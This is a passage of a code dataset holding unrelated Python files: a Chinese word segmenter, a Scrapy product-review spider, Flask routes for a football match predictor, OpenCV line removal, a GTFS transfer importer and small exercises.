-= 1\n sub_sentence = sub_sentence[-max_cut_length:]\n\n sentence = sentence[0:-max_cut_length] # 待切分序列去掉最后已经切除的词语\n words_length -= max_cut_length\n\n cut_word_list.reverse() # 由于RMM从后往前切词,list中的词语顺序是反的,因此输出前要reverse一下\n return cut_word_list\n\n\nif __name__ == '__main__':\n words_dic = load_dic.init()\n\n with open(\"./train.txt\", \"r\", encoding=\"utf8\") as train_set:\n for line in train_set:\n print(\" \".join(cut_words(line, words_dic)))\n","sub_path":"RMM/RMM.py","file_name":"RMM.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"24095295","text":"import requests\nimport json\nimport logging\nlog = logging.getLogger(__name__)\nsh = logging.StreamHandler()\nlog.addHandler(sh)\n\nrequests.packages.urllib3.disable_warnings()\n\nbase_url = 'https://localhost:8443/api'\n\ndef test_groups():\n _id = 'test'\n r = requests.get(base_url + '/groups/' + _id + '?user=admin@user.com&root=true', verify=False)\n assert r.status_code == 404\n payload = {\n '_id': _id\n }\n payload = json.dumps(payload)\n r = requests.post(base_url + '/groups?user=admin@user.com&root=true', data=payload, verify=False)\n assert r.ok\n r = requests.get(base_url + '/groups/' + _id + '?user=admin@user.com&root=true', verify=False)\n assert r.ok\n payload = {\n 'name': 'Test group',\n }\n payload = json.dumps(payload)\n r = requests.put(base_url + '/groups/' + _id + '?user=admin@user.com&root=true', data=payload, verify=False)\n assert r.ok\n r = requests.delete(base_url + '/groups/' + _id + '?user=admin@user.com&root=true', verify=False)\n assert r.ok\n","sub_path":"test/integration_tests/test_groups.py","file_name":"test_groups.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"602437950","text":"import xml.etree.cElementTree as ET\nimport pprint\nfrom collections import defaultdict\n\"\"\"\nIn this file, the program goes through and counts every different \ninstance of the k values in the tag elements.\n\nThis is required for later data auditing.\n\nThis code came from earlier exercises in Open Case Study.\n\"\"\"\n\n\n'''\nProcess element tags to see all the different k values.\n\nArgs:\n\tfilename (osm file): File to inspect.\n\nReturns:\n\tdict: All the k values as keys, and their number of occurances as values of the dictionary.\n'''\ndef process_k(filename):\n\ttag_k_types = defaultdict(int)\n\n\tfor _, element in ET.iterparse(filename):\n\t\tif element.tag == \"tag\":\n\t\t\ttag_k_types[ element.attrib['k'] ] += 1\n\n\treturn tag_k_types\n\n\ntag_k = process_k('TB_map.osm')\npprint.pprint(tag_k)","sub_path":"Code/tag_k_types.py","file_name":"tag_k_types.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"21577427","text":"import os\nimport re\nimport logging\nfrom datetime import datetime\n\nfrom scrapy.spider import BaseSpider\nfrom scrapy.selector import HtmlXPathSelector\nfrom scrapy.http import Request\nfrom scrapy.utils.url import urljoin_rfc\nfrom scrapy.utils.response import get_base_url\n\nfrom product_spiders.utils import extract_price\nfrom demoritems import DemoRMeta, Review, ReviewLoader\n\nfrom product_spiders.items import Product, ProductLoaderWithNameStrip as ProductLoader\nimport demjson\n\nHERE = os.path.abspath(os.path.dirname(__file__))\n\nclass DebenhamsSpider(BaseSpider):\n name = 'demo_r-debenhams.com'\n allowed_domains = ['debenhams.com', 'debenhamsplus.com', 'debenhams.ugc.bazaarvoice.com']\n start_urls = [\n 'http://www.debenhams.com',\n ]\n\n user_agent = 'spd'\n\n def parse(self, response):\n hxs = HtmlXPathSelector(response)\n\n categories = response.xpath('//li[div[contains(text(), \"Audio, vision & technology\")]]//a/@href').extract()\n for category in categories:\n yield Request(response.urljoin(category))\n\n categories = response.xpath('//div[@id=\"subCategorycategories\"]/ul/li/a/@href').extract()\n categories += response.xpath('//li[@id=\"categories\"]/ul/li/a/@href').extract()\n categories += response.xpath('//div[@class=\"cat_detail\"]/div/a/@href').extract()\n for category in categories:\n url = urljoin_rfc(get_base_url(response), category)\n yield Request(url)\n\n # products new parse method\n products = response.xpath('//div[contains(@id, \"PSPProductList\")]')\n for product in products:\n loader = ProductLoader(item=Product(), selector=product)\n\n name = \"\".join(product.xpath(\".//div[contains(@class, 'product_name')]//text()\").extract()).strip()\n brand = product.xpath('div/a/div[@class=\"brand_name\"]/text()').extract()[0].strip()\n\n url = product.xpath(\".//a/@href\").extract()\n url = urljoin_rfc(get_base_url(response), url[0])\n\n sku = product.xpath(\".//div[contains(@id, 'psp')]/@id\").re(\"psp_(.+)\")[0]\n\n price = product.xpath(\".//span[@class='price_now']/text()\").re(u'Now\\xa0\\xa3(.*)')\n if not price:\n price = product.xpath(\".//span[@class='price-actual' and @itemprop='price']/text()\").extract()\n\n if price:\n price = price[0]\n else:\n price = ''\n loader.add_value('stock', 0)\n\n category = response.xpath('//div[@id=\"box_productSelectionPage\"]/div/h1/text()').extract()\n category = category[0].strip() if category else ''\n\n loader.add_value('name', name)\n loader.add_value('brand', brand)\n# loader.add_value('category', category)\n loader.add_value('url', url)\n loader.add_xpath('image_url', 'div//img[@class=\"proImg\"]/@src')\n loader.add_value('sku', sku)\n loader.add_value('identifier', sku)\n loader.add_value('price', price)\n\n\n item = loader.load_item()\n metadata = DemoRMeta()\n metadata['reviews'] = []\n metadata['promotion'] = ''.join(product.xpath('.//span[@class=\"discount_savings\"]/text()').extract())\n item = loader.load_item()\n item['metadata'] = metadata\n\n yield Request(item['url'], meta={'item':item}, callback=self.parse_product)\n\n for page in response.xpath('//div[@id=\"pagination\"]/a/@href').extract():\n url = urljoin_rfc(get_base_url(response), page)\n yield Request(url)\n\n def parse_product(self, response):\n hxs = HtmlXPathSelector(response)\n item = response.meta['item']\n\n item['category'] = ' > '.join([x.strip() for x in response.xpath('//div[@class=\"breadcrumb_links\"]//a/text()').extract()])\n\n # stock\n stock_data = response.xpath('//div[contains(@id, \"entitledItem_\")]/text()').extract()\n if stock_data:\n data = demjson.decode(stock_data[0])\n if data:\n stock = data[0]['inventory_stock']\n try:\n if float(stock):\n #item['stock'] = 1\n pass\n else:\n item['stock'] = 0\n except ValueError:\n item['stock'] = 0\n\n reviews_url = 'http://debenhams.ugc.bazaarvoice.com/9364redes-en_gb/%s/reviews.djs?format=embeddedhtml&scrollToTop=true'\n part_number = response.url.split('_')[-2]\n yield Request(reviews_url % part_number, callback=self.parse_review_page, meta={'product': item})\n\n def parse_review_page(self, response):\n item_ = response.meta.get('product', '')\n hxs = HtmlXPathSelector(text=self._extract_html(response))\n reviews = response.xpath('//div[@class=\"BVRRReviewDisplayStyle5\"]')\n for review in reviews:\n l = ReviewLoader(item=Review(), response=response, date_format='%m/%d/%Y')\n rating = review.select(\".//span[contains(@class,'BVRRRatingNumber')]/text()\").extract()[0]\n date = review.select(\".//span[contains(@class,'BVRRValue BVRRReviewDate')]/text()\").extract()[0]\n review = review.select(\".//span[contains(@class,'BVRRReviewText')]/text()\")[0].extract()\n\n l.add_value('rating', rating)\n l.add_value('url', response.url)\n l.add_value('date', datetime.strptime(date, '%d %B %Y').strftime('%m/%d/%Y'))\n l.add_value('full_text', review)\n item_['metadata']['reviews'].append(l.load_item())\n\n next = response.xpath('//span[@class=\"BVRRPageLink BVRRNextPage\"]/a/@data-bvjsref').extract()\n if next:\n yield Request(next[0], callback=self.parse_review_page, meta={'product': item_})\n else:\n yield item_\n\n def _extract_html(self, response):\n review_html = ''\n for line in response.body.split('\\n'):\n if 'var materials=' in line:\n review_html = line.split('\"BVRRSecondaryRatingSummarySourceID\":\" ')[-1].split('\\n}')[0].replace('\\\\', '')\n return review_html\n","sub_path":"e-commerce/CompetitorMonitor/product_spiders/spiders/demo_r/debenhams_spider.py","file_name":"debenhams_spider.py","file_ext":"py","file_size_in_byte":6166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"615207829","text":"# Defineste rutele pentru pagina de index\n\nimport datetime\nimport os.path\nimport xml.etree.ElementTree as ET\nimport zipfile as z\n\nfrom flask import Blueprint\nfrom flask import render_template\nfrom flask import request\n\nimport application.dialog_windows as dw\nimport global_library\nfrom application.admin import create_db\nfrom application.admin import delete_db\nfrom application.admin import import_matches\nfrom application.connected import download_future_match\nfrom application.connected import download_user_matches\nfrom application.connected import hattrick_connect\nfrom application.connected import hattrick_disconnect\nfrom application.estimation import estimation_engine\n\nindex_bp = Blueprint('index_bp', __name__, template_folder='templates', static_folder='static')\n\n\n# Functia intoarce numele echipei selectate pentru a-i afla viitoarele meciuri\ndef get_user_team_name():\n if global_library.team_id == global_library.user_data['team 1 id']:\n return global_library.user_data['team 1 name']\n elif global_library.team_id == global_library.user_data['team 2 id']:\n return global_library.user_data['team 2 name']\n else:\n return global_library.user_data['team 3 name']\n\n\n# Functia arata daca echipa test_team joaca acasa sau in deplasare\ndef home_or_away(match_id, test_team):\n real_home_team = ''\n match_list = ET.parse(global_library.matches_savepath).getroot()[5][5]\n for match in match_list.findall('Match'):\n if match_id == match[0].text:\n real_home_team = match[1][1].text\n break\n return 'Home' if test_team == real_home_team else 'Away'\n\n\n# index\n@index_bp.route('/')\ndef home():\n return render_template('index.html', title=\"The Best Match Predictor\", ratings=global_library.ratings,\n positions=global_library.positions,\n statuses=global_library.statuses, from_index=True,\n match_orders=global_library.default_match_orders,\n answer=global_library.ans)\n\n\n# conectarea la Hattrick\n@index_bp.route('/LoginToHattrick')\ndef LoginToHattrick():\n connection_successful, global_library.user_data = hattrick_connect.connection_engine()\n if connection_successful:\n return render_template('connected.html', title=\"Connected to Hattrick\", from_index=False,\n ratings=global_library.ratings,\n positions=global_library.positions, statuses=global_library.statuses,\n user_data=global_library.user_data,\n match_orders=global_library.default_match_orders,\n answer=global_library.ans)\n else:\n return render_template('index.html', title=\"The Best Match Predictor\", ratings=global_library.ratings,\n positions=global_library.positions,\n statuses=global_library.statuses, from_index=True, answer=global_library.ans,\n match_orders=global_library.default_match_orders)\n\n\n# algoritmul de estimare\n@index_bp.route('/EstimationEngine', methods=['POST'])\ndef estimation():\n return render_template('index.html', title=\"The Best Match Predictor\", ratings=global_library.ratings,\n positions=global_library.positions,\n statuses=global_library.statuses, from_index=True,\n match_orders=global_library.default_match_orders,\n answer=estimation_engine.estimate_results(given_ratings=[i for i in request.form.values()]))\n\n\n# deconectarea de la Hattrick\n@index_bp.route('/DisconnectFromHattrick')\ndef disconnect_from_hattrick():\n hattrick_disconnect.disconnection_engine()\n return render_template('index.html', title=\"The Best Match Predictor\",\n ratings=global_library.ratings, positions=global_library.positions,\n statuses=global_library.statuses, from_index=True,\n match_orders=global_library.default_match_orders,\n answer=global_library.ans)\n\n\n# importarea de meciuri in baza de date\n@index_bp.route('/import', methods=['POST'])\ndef import_matches_into_database():\n import_matches.import_engine(low_end=int(request.form['InferiorLimit']),\n high_end=int(request.form['SuperiorLimit']))\n dw.show_info_window_in_thread(title='Import terminat', message='Am importat toate meciurile alese')\n return render_template('admin.html', title='Admin Control Panel')\n\n\n# iesirea din panoul de control catre prima pagina\n@index_bp.route('/LogoutToIndex')\ndef logout():\n match_orders = global_library.default_match_orders\n return render_template('index.html', title=\"The Best Match Predictor\",\n ratings=global_library.ratings, positions=global_library.positions,\n statuses=global_library.statuses, from_index=True, match_orders=match_orders,\n answer=global_library.ans)\n\n\n# crearea bazei de date\n@index_bp.route('/create')\ndef create():\n create_db.create_database()\n return render_template('admin.html')\n\n\n# stergerea bazei de date\n@index_bp.route('/delete')\ndef delete():\n delete_db.delete_database()\n return render_template('admin.html')\n\n\n# Intoarce numele echipei selectate\n@index_bp.route('/Team', methods=['POST'])\ndef get_team_id():\n team_id = request.form['HattrickTeams']\n global_library.team_id = team_id\n global_library.user_team_name = get_user_team_name()\n user_matches = download_user_matches.download_user_matches(team_id)\n global_library.user_matches = user_matches\n match_orders = global_library.default_match_orders\n return render_template('connected.html', title=\"Connected to Hattrick\", from_index=False,\n ratings=global_library.ratings,\n positions=global_library.positions, statuses=global_library.statuses,\n user_data=global_library.user_data,\n user_matches=user_matches, match_orders=match_orders, answer=global_library.ans)\n\n\n# Intoarce numarul de identificare al unui meci selectat\n@index_bp.route('/GetMatch', methods=['POST'])\ndef get_match_id():\n match_id = request.form['FutureMatches']\n match_orders = download_future_match.download_future_match(match_id, global_library.team_id)\n place = home_or_away(match_id, global_library.user_team_name)\n return render_template('connected.html', title=\"Connected to Hattrick\", from_index=False,\n ratings=global_library.ratings,\n positions=global_library.positions, statuses=global_library.statuses,\n user_data=global_library.user_data,\n user_matches=global_library.user_matches, match_orders=match_orders, place=place,\n answer=global_library.ans)\n\n\n@index_bp.route('/backup')\ndef backup_database():\n archive_name = global_library.database_backup_path + '\\\\backup ' + datetime.datetime.now().strftime(\n '%Y-%m-%d %H-%M-%S') + '.zip'\n with z.ZipFile(file=archive_name, mode='w') as backup:\n backup.write(global_library.database_file_path,\n arcname='matches.db')\n dw.show_info_window_in_thread(title='Backup terminat', message='Am terminat backupul bazei de date.')\n return render_template('admin.html')\n\n\n@index_bp.route('/restore')\ndef restore_database():\n restore_database_file_name = dw.restore_backup_window_in_thread()\n with z.ZipFile(restore_database_file_name, 'r') as restore:\n restore.extractall(os.path.dirname(global_library.database_file_path))\n dw.show_info_window_in_thread(title='Restaurare incheiata', message='S-a incheiat restaurarea backupului ales')\n return render_template('admin.html')\n","sub_path":"application/index/index_routes.py","file_name":"index_routes.py","file_ext":"py","file_size_in_byte":7956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"24644627","text":"__author__ = 'muhammad.bc'\nimport os\nimport platform\nimport sys\nfrom PySide.QtCore import *\nfrom PySide.QtGui import *\nimport helpform\nimport newimagedlg\nimport qrc_resources\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n\n QMainWindow.__init__(self, None)\n\n self.oamge = QImage()\n self.dirty = False\n self.filename = None\n self.mirroredvertically = False\n self.mirroredharizontally = False\n\n self.imageLabel = QLabel\n self.imageLabel.setMinimumWidth(200, 200)\n self.imageLabel.setAlignment(Qt.AlignCenter)\n self.imageLabel.setContextMenuPolicy(Qt.ActionsContextMenu)\n self.setCentralWidget(self.imageLabel)\n\n self.logDockWidget = QDockWidget(\"Log\", self)\n self.logDockWidget.setObjectName(\"LogDockwidgetArea\")\n self.logDockWidget.setAllowedAreas(Qt.LeftDockWidgetArea | Qt.RightDockWidgetArea)\n\n self.listWidget = QListWidget()\n self.logDockWidget.setWidget(self.listWidget)\n self.addDockWidget(Qt.RightDockWidgetArea, self.logDockWidget)\n\n self.label = QLabel()\n self.label.setFrameStyle(QFrame.StyledPanel | QFrame.Sunken)\n self.status = self.statusBar()\n self.status.setSizeGripEnable(False)\n self.status.addPermanenWidget(self.label)\n self.status.showMessage(\"Ready\",500)\n\n\n\n","sub_path":"PyQt/Test_Core_Qt_Win.py","file_name":"Test_Core_Qt_Win.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"45138802","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Feb 23 15:48:01 2018\n\n@author: bebxadvaboy\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport os\nfrom sklearn.model_selection import train_test_split\nimport tensorflow as tf\n\ndef get_MNIST_data():\n \n data = pd.read_csv(os.path.join(\"data\",\"train.csv\"))\n X_train = (data.ix[:,1:].values).astype('float32') # all pixel values\n #X_train = X_train.reshape((X_train.shape[0], 28, 28))\n y_train = data.ix[:,0].values.astype('int32') # only labels i.e targets digits \n# b = np.zeros((X_train.shape[0],10))\n# b[np.arange(X_train.shape[0]), y_train] = 1\n X_train, X_val, Y_train, Y_val = train_test_split(X_train, y_train, test_size=0.1, random_state=42)\n X_train = X_train/255.0\n X_val = X_val/255.0\n Y_train = np.array([Y_train])\n Y_val = np.array([Y_val])\n train = pd.DataFrame(np.concatenate((Y_train.T, X_train), axis=1))\n test = pd.DataFrame(np.concatenate((Y_val.T, X_val), axis=1))\n test.to_csv('test.csv', index=False) \n train.to_csv('train.csv', index=False) \n\n \n \n\ndef reset_graph():\n \n if 'sess' in globals() and sess:\n sess.close()\n \n tf.reset_default_graph()","sub_path":"helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"292656718","text":"# Import required libraries and modules\nimport cv2\nimport numpy as np\nfrom datetime import datetime\n\n\ndef removeLine(img):\n '''\n This function take an argument as image(numpy array)\n\n Hough Line transform is technique to detect line \n (even if shortly broken) in computer vision.\n\n It detect lines and remove it. (Here apply white color.) and return image(processed)\n '''\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) # Convert image into grayscale\n \n # This both line detect lines in image\n edges = cv2.Canny(gray,50,150,apertureSize = 3) \n lines = cv2.HoughLines(edges,1,np.pi/180, 50) \n\n for line in lines:\n for r, theta in line: \n \n a = np.cos(theta) \n b = np.sin(theta) \n \n x0 = a*r \n \n # y0 stores the value rsin(theta) \n y0 = b*r \n \n # x1 stores the rounded off value of (rcos(theta)-1000sin(theta)) \n x1 = int(x0 + 1000*(-b)) \n \n # y1 stores the rounded off value of (rsin(theta)+1000cos(theta)) \n y1 = int(y0 + 1000*(a)) \n \n # x2 stores the rounded off value of (rcos(theta)+1000sin(theta)) \n x2 = int(x0 - 1000*(-b)) \n \n # y2 stores the rounded off value of (rsin(theta)-1000cos(theta)) \n y2 = int(y0 - 1000*(a)) \n \n if (theta < 0.05 and theta > -0.05) or (theta > 1.56 and theta < 1.58):\n cv2.line(img,(x1,y1), (x2,y2), (255,255,255),5)\n \n return img\n\n\ndef removeBox(img):\n '''\n This function take an argument as image(numpy array)\n\n Contour finding method used for find contour(Rectangle box)\n in image. It's time complexity is less that HoughLine Transform \n \n It detect all rectangle.\n '''\n BLUR = 21\n CANNY_THRESH_1 = 10\n CANNY_THRESH_2 = 200\n MASK_DILATE_ITER = 10\n MASK_ERODE_ITER = 10\n MASK_COLOR = (0.0,0.0,0.0) # In BGR format\n\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) # Convert image into grayscale \n\n edges = cv2.Canny(gray,CANNY_THRESH_1, CANNY_THRESH_2)\n edges = cv2.dilate(edges, None)\n edges = cv2.erode(edges, None)\n\n # Detect contour using findContours method\n contour_info = []\n contours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n\n for c in contours:\n contour_info.append((c, cv2.isContourConvex(c), cv2.contourArea(c),))\n contour_info = sorted(contour_info, key=lambda c: c[2], reverse=True)\n \n for i in contour_info:\n (x, y, w, h) = cv2.boundingRect(i[0])\n if i[2] < 2500:\n break\n cv2.rectangle(img, (x,y), (x+w, y+h), (255, 255, 255), 5) # It take all rectange and put white color.\n \n return img\n","sub_path":"VisionAPI/VisionModule/removeNoise.py","file_name":"removeNoise.py","file_ext":"py","file_size_in_byte":2802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"44961170","text":"# Write a Python program to accept a filename from the user and print the extension of that. \n# Sample filename : abc.java\n# Output : java\n\nimport os\n\nfilen = input(\"Enter a file name: \")\nfilename, file_extension = os.path.splitext(filen)\n\nprint(file_extension)\n\n","sub_path":"basics/ex_007.py","file_name":"ex_007.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"131481463","text":"# -*- coding: iso-8859-15 -*-\n'''\nVISUM add-in Import Google Transit Feed\n\nDate: 22.05.2014\nAuthor: Dimitri Krutik\nContact: Dimitri.Krutik@ptvgroup.com\nCompany: PTV AG'''\n\nimport GoogleTransitImport.Operations as op\nfrom GoogleTransitImport import GoogleTransitExceptions as ex\nfrom GoogleTransitImport.TransitDataImporter.DataConverter.ConverterBase import ConverterBase\n\n\nclass TransfersConverter(ConverterBase):\n \"\"\"\n Parse \"transfers.txt\".\n \"\"\"\n tSysCode_Walk = \"F\"\n\n def __init__(self):\n super(TransfersConverter, self).__init__()\n self.__stopsData = None\n self.__hasTransferBetweenStops = False\n\n def _initializeDataForExecution(self, worker):\n super(TransfersConverter, self)._initializeDataForExecution(worker)\n self.__stopsData = self._worker.Storage.get(\"StopsData\")\n\n def _resetLocalData(self):\n super(TransfersConverter, self)._resetLocalData()\n self.__stopsData = None\n self.__hasTransferBetweenStops = False\n\n def _startConversion(self):\n if self._worker.Files.transfersfile == None:\n return\n\n self.__parseTransfersFile()\n\n if self.__hasTransferBetweenStops:\n mess0 = _(\"Some transfer times between stops areas could not be imported, because the stop areas are associated with different stops.\").decode('iso-8859-15')\n mess1 = _(\"The transfer times between those stop areas will be calculated from 'PuTWalk'.\").decode('iso-8859-15')\n mess2 = _(\"See file '%s'.\").decode('iso-8859-15') % self._worker.Files.TransfersFileName\n mess = \"%s %s %s\" % (mess0, mess1, mess2)\n self._worker.WriteWarning(mess)\n\n\n def __parseTransfersFile(self):\n\n with self._worker.OpenCSVFile(self._worker.Files.transfersfile) as csvReader:\n try:\n self._setReadFileProgressDlg(csvReader)\n self._progressDlg.Message = _(\"Processing transfers\")\n\n if self.__containsTransferTimes(csvReader):\n self.__parseTransfers(csvReader)\n\n except ex.ExecutionCanceled:\n raise\n\n except Exception as e:\n mess = self._createDefaultReadFileExceptionMessage(self._worker.Files.TransfersFileName)\n raise ex.GoogleTransitException(mess, e)\n\n finally:\n self._resetReadFileProgressDlg()\n\n @classmethod\n def __containsTransferTimes(cls, csvReader):\n \"\"\"\n Check if \"min transfer time\" attribute is defined in the file.\n \"\"\"\n try:\n csvReader.fieldnames.index(\"min_transfer_time\")\n return True\n except Exception:\n return False\n\n def __parseTransfers(self, csvReader):\n for tranferRecord in csvReader:\n self._progressDlg.UpdateProgressDialog()\n self._progressDlg.LineCount += 1\n\n transfer = self.__parseTransferRecord(tranferRecord)\n\n if self.__canSetTransferTime(transfer):\n self.__setTransferTime(transfer)\n\n def __canSetTransferTime(self, transfer):\n \"\"\"\n Check, if the transfer time can be set:\n only if the time value is available and the stops are in the same station.\n The transfer time between two single stops can not be set in Visum.\n In Visum the transfer time between stops is a calculated value.\n \"\"\"\n if not transfer.hasTransferTime():\n return False\n\n if transfer.fromStopId != transfer.toStopId:\n if not self.__stopsData.isTheSameStation(transfer.fromStopId, transfer.toStopId):\n self.__hasTransferBetweenStops = True\n return False\n\n return True\n\n def __parseTransferRecord(self, tranferReader):\n transfer = Transfer()\n transfer.fromStopId = op.MakeSafeString(self._readRequiredAttribute(tranferReader, \"from_stop_id\"))\n transfer.toStopId = op.MakeSafeString(self._readRequiredAttribute(tranferReader, \"to_stop_id\"))\n\n minTransferTime = self._readAttribute(tranferReader, \"min_transfer_time\")\n transfer.timeSec = self.__getTransferTimeEntry(minTransferTime)\n return transfer\n\n def __setTransferTime(self, transfer):\n fromStopAreas = self.__stopsData.getStopAreas(transfer.fromStopId)\n\n if transfer.fromStopId == transfer.toStopId:\n toStopAreas = fromStopAreas\n else:\n toStopAreas = self.__stopsData.getStopAreas(transfer.toStopId)\n\n for fromArea in fromStopAreas:\n for toArea in toStopAreas:\n self.__createTransferWalkTime(fromArea, toArea, transfer.timeSec)\n\n\n def __createTransferWalkTime(self, fromArea, toArea, timeSec):\n transfer = self._netObjectFactory.CreateTransferWalkTimeStopArea(fromStopArea = fromArea,\n toStopArea = toArea,\n tsysCode = self.tSysCode_Walk,\n time = timeSec)\n self._visumTables.AddTransferWalkTimeStopAreaEntry(transfer)\n\n @classmethod\n def __getTransferTimeEntry(cls, minTransferTimeVal):\n \"\"\"\n Create the transfer time entry for Visum.\n Format: \"180s\"\n minTransferTimeVal - transfer time in seconds.\n \"\"\"\n if minTransferTimeVal:\n try:\n return \"%ss\" % int(minTransferTimeVal)\n except Exception:\n pass\n\n return None\n\n\nclass Transfer(object):\n\n __slots__ = (\"fromStopId\", \"toStopId\", \"timeSec\")\n\n def __init__(self):\n self.fromStopId = \"\"\n self.toStopId = \"\"\n self.timeSec = None\n\n def hasTransferTime(self):\n return self.timeSec != None\n","sub_path":"GoogleTransitImport/TransitDataImporter/DataConverter/TransfersConverter.py","file_name":"TransfersConverter.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"184678658","text":"\ndef Range(start=None,stop=None,step=1) :\n if start is None :\n return 0\n if stop is None :\n stop = start\n start = 0\n if type(start) is not int or type(stop) is not int or type(step) is not int :\n print(\"Argument type error\")\n return 0\n a=[]\n if step > 0 :\n while stop > start :\n a.append(start)\n start += step\n elif step < 0 :\n while stop < start :\n a.append(start)\n start += step\n return a\n\n","sub_path":"Practice/o.dagestanski/Test_work8/t3.py","file_name":"t3.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"488276172","text":"class Solution:\n def groupAnagrams(self, strs):\n ans = collections.defaultdict(list)\n for s in strs:\n count = [0] * 26\n for c in s:\n count[ord(c) - ord('a')] += 1\n ans[tuple(count)].append(s)\n return ans.values()\n\n\nclass Solution1:\n def groupAnagrams(self, strs: List[str]) -> List[List[str]]:\n res = []\n l = dict()\n for i in range(len(strs)):\n item = strs[i]\n sorted_characters = sorted(item)\n item = \"\".join(sorted_characters)\n if item in l:\n l[item].append(strs[i])\n else:\n l[item] = [strs[i]]\n for item in l:\n res.append(l[item])\n return res\n","sub_path":"map/49_group_anagram.py","file_name":"49_group_anagram.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"53555767","text":"\"\"\"\n4 4 1 1\n1 2\n1 3\n2 3\n2 4\n\"\"\"\n\nfrom collections import deque\n\nN, M, K, X = map(int, input().split())\n\n# 인접 리스트\ncities = [[] for _ in range(N + 1)]\n\nfor _ in range(M):\n city1, city2 = map(int, input().split())\n cities[city1].append(city2)\n\n# 도시별 경로\nnum_of_paths = [-1] * (N + 1)\n# 출발점 0으로 초기화\nnum_of_paths[X] = 0\n\n\ndef bfs():\n queue = deque([X])\n while queue:\n cur_city = queue.popleft()\n for city in cities[cur_city]:\n # -1이면 방문한 적이 없는 도시\n if num_of_paths[city] == -1:\n # 현재 방문한 도시의 경로 + 1\n num_of_paths[city] = (num_of_paths[cur_city] + 1)\n queue.append(city)\n\n\nbfs()\n\nresult = []\n\n# 경로의 길이가 K인 도시들 찾기\nfor index, path in enumerate(num_of_paths):\n if path == K:\n result.append(index)\n\n# 도시가 없을 때 -1 넣기\nif not len(result):\n result.append(-1)\n\nfor c in result:\n print(c)\n","sub_path":"광훈/PART03/DFS&BFS/15_특정_거리의_도시_찾기.py","file_name":"15_특정_거리의_도시_찾기.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"262455011","text":"from django.urls import path, include\nfrom rest_framework import routers\n\nfrom . import views\n\napp_name = 'api'\n\nrouter = routers.DefaultRouter()\nrouter.register(r'assemblies', views.AssemblyList)\nrouter.register(r'motions', views.MotionList)\nrouter.register(r'amendments', views.AmendmentList)\n\n\nurlpatterns = [\n path('', include(router.urls)),\n # ex: api/signup\n path('anon-token/', views.token),\n # ex: api/signup\n path('signup/', views.signup),\n # ex: api/login\n path('login/', views.login_student),\n # ex: api/logout\n path('logout/', views.logout_student),\n # ex: /api/1\n path('assemblies//', views.AssemblyDetail.as_view()),\n # ex: /api/motions/1\n path('motions//', views.MotionDetail.as_view()),\n # ex: /api/amendments/1/vote\n path('motions//vote', views.MotionDetailVote),\n # ex: /api/amendments/1\n path('amendments//', views.AmendmentDetail.as_view()),\n # ex: /api/amendments/1/vote\n path('amendments//vote', views.AmendmentDetailVote),\n\n]","sub_path":"scannvote/apis/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"5865845","text":"import logging\nimport random\n\nlogger = logging.getLogger(__name__)\nlogging.basicConfig()\nlogger.setLevel(logging.INFO)\n\nfrom django.core.management.base import BaseCommand \nfrom django.core.management import setup_environ\nfrom leestbot import settings\nsetup_environ(settings)\n\nfrom leestSniffer import models\nfrom twitter_api import api\n\napp = api.app_get_twitter_accounts\nclass Command(BaseCommand):\n \"\"\" Command to send a notification to an email. \"\"\"\n\n def handle(self, **options):\n \"\"\" The handle is called when ./manage.py notification is ran.\n\n Command to add to cronjob:\n @daily /usr/bin/eval PYTHONPATH=/home/leestbot/modules python /home/leestbot/leestbot/manage.py notification >>/home/leestbot/cronrun 2>&1\n \"\"\"\n logger.info('**'*20)\n logger.info('Running {0}.'.format(__file__))\n\n count = models.Tweeter.objects.count()\n\n if count:\n # getting a random user.\n #\n tweeter = models.Tweeter.objects.all()[\n random.randrange(1, count)\n ]\n logger.info('Getting friends of {0}.'.format(tweeter.slug))\n tweeter.app = app\n tweeter.get_friends(100)\n\n else:\n logger.warning('No Tweeter account found!')\n\n","sub_path":"leestSniffer/management/commands/get_twitter_accounts.py","file_name":"get_twitter_accounts.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"581087904","text":"from __future__ import print_function, division\n\nimport matplotlib.pyplot as plt\nimport cv2\nimport numpy as np\nimport skimage as ski\nimport skimage.morphology as morp\n\nimport pickle\nimport functools\nimport operator\nimport pandas as pd\nimport theano\nimport theano.tensor as T\nfrom 